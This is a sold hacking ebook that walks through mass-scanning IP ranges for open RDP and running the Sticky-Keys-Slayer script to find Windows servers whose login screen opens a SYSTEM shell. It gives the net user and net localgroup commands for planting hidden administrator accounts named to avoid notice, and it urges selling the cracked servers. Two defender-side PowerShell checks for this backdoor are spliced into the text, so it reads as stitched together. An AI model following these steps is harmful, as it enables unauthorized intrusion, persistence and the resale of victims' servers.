
DISCORD SUPPORT ➤ PunchMan#1250

INTRODUCTION
Hello and thank you for your purchase!

Welcome to RDP KING.

By doing this tutorial step by step you will learn:

➜ How to find potentially vulnerable RDP’s using a powerful script.
➜ How to make yourself the owner of the RDP’s.
➜ How the script works.
➜ How you can use the servers you crack.


Before we start I want to make sure that you know some
server-related words:
➜ VPS: Virtual Private Server, it's basically a private server that runs
inside a “dedicated” (normal) server. It is a virtual environment, like a
Virtual Machine.
➜ RDP: Remote Desktop Protocol, it’s the protocol we use to connect to
Windows VPSs; we also call a Windows VPS itself an RDP.
Now, let’s talk about the OS and software we are going to use. I
recommend using both a Windows and a Linux environment (like Kali Linux).
If you are using Windows, as many users do, you can easily install a Kali
Linux Virtual Machine on your Windows PC. (Using a standalone Windows
install is recommended instead.)
You can quickly create a Virtual Machine with the help of Google or by
following guides from YouTube.
Example:
https://www.youtube.com/watch?v=SVyWeQTtHu8

HOW DOES THE SCRIPT WORK?


The script we are going to use is entirely based on a kind of
bug/exploit: some servers make the cmd pop up when we press the
shift button 5 times, without the need of logging in. This lets us become
the administrator of the machine, so that we can create a new user and
give it full admin permissions. This also means that the real
owner of the RDP cannot see what we are running on the machine.
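What the guide calls a “bug/exploit” is the well-known sticky keys backdoor: the Sticky Keys handler sethc.exe, which the login screen launches when SHIFT is pressed five times, has been replaced by cmd.exe or redirected to it through an Image File Execution Options “Debugger” value, so a shell runs as SYSTEM before anyone logs in. The PowerShell check below is an added example for administrators of a Windows RDP host; it is not part of this guide or of the Sticky-Keys-Slayer project. It hashes the accessibility binaries in System32 against the command shells, inspects the IFEO keys, and reports whether RDP enforces Network Level Authentication, the setting that stops an unauthenticated client from ever reaching the login screen that the script screenshots. The list of binaries checked, the variable names and the output format are my own choices.

```powershell
# Added defender-side check (not part of the original guide or the Sticky-Keys-Slayer project).
# Run in an elevated PowerShell on the Windows host you administer.
# Flags the two classic ways the Sticky Keys prompt is turned into a login-screen shell:
#   1. an accessibility binary in System32 that is byte-identical to cmd.exe / powershell.exe
#   2. an Image File Execution Options "Debugger" redirect for one of those binaries
# and reports whether RDP requires Network Level Authentication (NLA).

$System32      = Join-Path $env:SystemRoot 'System32'
$Accessibility = 'sethc.exe','utilman.exe','osk.exe','narrator.exe','magnify.exe','displayswitch.exe','atbroker.exe'
$IfeoRoot      = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

$findings = @()

# Hashes of the shells an attacker typically copies over an accessibility binary
$shellHashes = foreach ($shell in 'cmd.exe','powershell.exe') {
    $p = Join-Path $System32 $shell
    if (Test-Path $p) { (Get-FileHash -Path $p -Algorithm SHA256).Hash }
}

foreach ($name in $Accessibility) {
    $path = Join-Path $System32 $name
    if (-not (Test-Path $path)) { continue }

    # 1. Replaced binary: the file on disk is really a command shell
    $hash = (Get-FileHash -Path $path -Algorithm SHA256).Hash
    if ($shellHashes -contains $hash) {
        $findings += "[!] $name is byte-identical to a command shell: $path"
    }

    # Microsoft system files are catalog-signed; PowerShell 5.1+ reports those as Valid.
    # On older hosts treat NotSigned here as a hint only and rely on the hash check above.
    $sig = Get-AuthenticodeSignature -FilePath $path
    if ($sig.Status -ne 'Valid') {
        $findings += "[!] $name signature status is $($sig.Status): $path"
    }

    # 2. IFEO redirect: Windows starts the Debugger value instead of the binary itself
    $ifeoKey = Join-Path $IfeoRoot $name
    if (Test-Path $ifeoKey) {
        $dbg = (Get-ItemProperty -Path $ifeoKey -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { $findings += "[!] IFEO Debugger set for ${name}: $dbg" }
    }
}

# 3. NLA: UserAuthentication = 1 means the client must authenticate before the login screen is shown,
#    so SHIFT x5 can only be typed by someone who already holds valid credentials.
$rdpTcp = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
$nla = (Get-ItemProperty -Path $rdpTcp -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication
if ($nla -ne 1) {
    $findings += "[!] RDP does not require Network Level Authentication (UserAuthentication=$nla)"
}

if ($findings.Count -eq 0) { 'No sticky-keys backdoor indicators found; NLA is enforced.' }
else { $findings }
```

A clean host prints the single “no indicators” line. Any `[!]` line on an Internet-facing RDP server is worth an incident ticket: a replaced or redirected accessibility binary means the login screen already hands out a SYSTEM shell, and a missing NLA requirement is what lets the scanner in this guide see that screen at all.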

COLLECTING THE IP ADDRESSES:
MASSCAN
The first step to start cracking RDPs consists in finding IP addresses with
port 3389 OPEN.
The fastest way to do that is collecting IP ranges and then finding which
ones have port 3389 open. In this guide we are going to use masscan,
but you can use another program; masscan is just the tool I always use,
and I think it’s the fastest port scanner.
If you are going to run masscan on an RDP, just be aware that some
companies do not allow running such a program on their servers, and
this might result in a ban.

1) Download and install on Windows the latest version of WinPcap
(https://www.winpcap.org/)
2) Download Masscan GUI https://mega.nz/#!JEU2nS6K!2-8_fQv9LVfcEzXCyhohft-xOsE4JUutPV9W7QtSe5Y (95% it’s not infected,
just a false positive, but you can run it sandboxed to be 100% safe)
3) Go to http://services.ce3c.be/ciprg/, pick the desired country, then click
« Generate » (see picture below)
4) Copy a bunch of the lines that the website has generated
(see picture below)
5) Open masscan and make it look like the lines in the black box
(Format example: 2.0.0.0-255.240.0.0)
6) Change the target port to 3389 and (if you have a good connection)
you can set a greater number of threads.
7) Wait until masscan ends or until you have collected some thousands
of IPs (10000+ recommended)
8) After gathering the needed IPs you can stop masscan (ctrl+c stops
the running scan)
9) Now you can click the “open results” button and enjoy your txt file
with all the IPs! Otherwise you can also open the txt file from the
masscan directory.

MOVING THE IP’s TO KALI LINUX

Once you have your txt file ready with the IPs, we need to move the file
from Windows to the Linux environment. The file must contain one IP per
line; if your file does not, you can easily extract the IP’s using this site:
http://www.toolsvoid.com/extract-ip-addresses

The easiest way to move the file is uploading it on https://anonfile.com/
and then downloading the file in the Linux environment (using the
download link that anonfile gives you).

Keep in mind the location of the txt file containing the IP’s.

SETTING UP THE SCRIPT
Before running the cracking script you will need to download and install
some applications and modules, to make sure that everything will work
without error messages.
Open the Kali Linux terminal and run these commands. Sometimes you
need to enter “y” to continue. (root permissions needed):
apt-get update
apt-get -y install imagemagick xdotool parallel bc
apt-get install rdesktop git

DOWNLOADING AND RUNNING THE SCRIPT
To clone (clone = download) the script run the following command; it is
recommended to clone the script in the root directory (= main directory).
Run this command to clone the script:
git clone https://github.com/linuz/Sticky-Keys-Slayer.git

Now, a directory called “Sticky-Keys-Slayer” has been created. To enter
that directory we use the command:
cd Sticky-Keys-Slayer

Before starting to run the script you will need to put in that directory
the txt file containing the IP’s we have found using masscan; an easy
way to do that is opening the file explorer, copying the txt file and
pasting it in the Sticky-Keys-Slayer directory.
Let’s suppose that you called the IPs file IPs.txt.
Run in the terminal the command:
./stickyKeysSlayer.sh -v -j8 -t 10 IPs.txt

Where IPs.txt is the name of the file containing the IPs.

Here is a sample picture:

The script will now be running and you will see some rdesktop tabs
popping up. Note that you should not use the PC while the script is
running, but if you set everything up in a Virtual Machine you can still use
it like before.

FINDING OUT VULNERABLE RDP’s

When the script ends, or when it gets aborted, it’s time to find out which
RDP’s are vulnerable; here is how to do it.
In the Sticky-Keys-Slayer directory you will find a folder called
“screenshots”; it contains a screenshot for every RDP you have scanned.
Inside the screenshots folder there will be another folder called
“discovered”. It contains the screenshots of the vulnerable RDPs.

Some of them are false positives, but if the screenshot shows the CMD
it’s probably a good result. Here is an example:

CREATING A NEW USER
Before creating new users with admin permissions on vulnerable servers
I have to warn you that if the following commands do not work on a
server you are trying to crack, it is likely that the server is not exploitable
and there is nothing you can do.

As mentioned before, the “discovered” folder contains all the servers
that show a cmd; open that folder to know the IP addresses of those
servers. The IP address is written in the file name of the screenshot and
at the top of the screenshot itself.

Now, open the terminal and execute this command to try to connect to a
“discovered” RDP.
rdesktop [ip address of vulnerable server]

You will see an rdesktop tab opening. On that rdesktop tab try to press
the SHIFT button 5 times; you will probably see the cmd appearing,
however in some cases you need to press shift 6+ times.

If you pressed shift and nothing happened, the server you are
trying to crack is probably not exploitable; it’s just a false positive.

If the cmd opens up correctly run this command to create a new user:
net user /add [username] [password]

Where [username] is the username you choose. I strongly recommend
using a name like “System” or “Windows” or “Other User” to avoid
being suspicious. You can choose whatever you want as password, just
make sure not to forget it! Write it down somewhere; an easy way to
identify cracked servers is [username]@[IP];[password], like
Windows@201.34.5.134;U4G8
Now to give your account full administrator functions run this command:
net localgroup Administrators [username] /add

You have successfully managed to create a new admin user, so you
have finally cracked the server; to login use the [IP] and the [username]
and [password] you just chose.

Obviously you will now have to repeat these steps for every
server you find in the “discovered” folder.
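The two `net` commands above leave a distinctive trail in the Windows Security log. A shell spawned from the login screen runs as LocalSystem, so the account creation (event 4720) and the Administrators membership change (event 4732) are recorded with subject SID S-1-5-18 and the computer account as the actor, rather than a named administrator who logged in. The PowerShell hunt below is an added defender-side example and not part of this guide; it assumes the host audits Account Management (the User Account Management and Security Group Management subcategories), takes the lookback window as a parameter, and uses field and variable names of my own choosing.

```powershell
# Added detection example (not part of the original guide). Run elevated on the Windows host.
# Requires the "Audit User Account Management" and "Audit Security Group Management"
# subcategories to be enabled, otherwise events 4720 / 4732 are never written.
param([int]$Days = 30)

# Pull one named field out of an event's EventData block
function Get-EventField {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

$filter = @{ LogName = 'Security'; Id = 4720, 4732; StartTime = (Get-Date).AddDays(-$Days) }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

$suspicious = foreach ($e in $events) {
    $subjectSid  = Get-EventField $e 'SubjectUserSid'
    $subjectName = Get-EventField $e 'SubjectUserName'

    if ($e.Id -eq 4720) {
        # 4720: TargetUserName is the account that was created
        $action = "created user '$(Get-EventField $e 'TargetUserName')'"
    } else {
        # 4732: TargetUserName is the group; MemberSid identifies the account that was added
        if ((Get-EventField $e 'TargetUserName') -ne 'Administrators') { continue }
        $action = "added $(Get-EventField $e 'MemberSid') to Administrators"
    }

    # S-1-5-18 is LocalSystem. A legitimate admin performing these actions shows up
    # under their own SID; a login-screen shell does not.
    if ($subjectSid -eq 'S-1-5-18') {
        [pscustomobject]@{
            Time    = $e.TimeCreated
            Subject = "$subjectName ($subjectSid)"
            Action  = $action
        }
    }
}

if ($suspicious) { $suspicious | Sort-Object Time | Format-Table -AutoSize }
else { "No SYSTEM-initiated account creation or Administrators change in the last $Days days." }
```

Run it as `.\Find-LoginScreenAccounts.ps1 -Days 90` (the file name is arbitrary) on any server that exposes 3389. A hit pairs naturally with the integrity check of the accessibility binaries: the event tells you an account was minted from the login screen, the binary check tells you how. Provisioning tools that genuinely run as SYSTEM will also appear here, so compare the reported times against your change records before acting.
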

CONCLUSIONS
I have taught you this advanced and private method to crack RDP’s; if
you have any questions I will do my best to help you, add me on
Discord: PunchMan#1250

With this advanced script you can crack about 3-15 servers every day
just by running it overnight.

You can do almost everything on the cracked servers, but if you use a lot
of system resources it’s possible that your server will be banned.

The hardware specs of the servers you crack are kind of random; there
is no way to predict how good/bad the server you are going to crack will
be. Also the Windows version is random; you will usually find Windows
2003, XP, 2008, 7 or 2012.

A great way to make money with these servers is selling them. I made a
decent amount of money selling servers, but of course you need to
restock your shop regularly and this takes time. Cracked servers are
often good for cracking, too.
Here is some proof from my Selly.gg:

I really hope this book has helped you, good cracking!

THIS EBOOK IS ONLY SOLD BY WHITEDEV AT:
https://shoppy.gg/@WhiteDEV
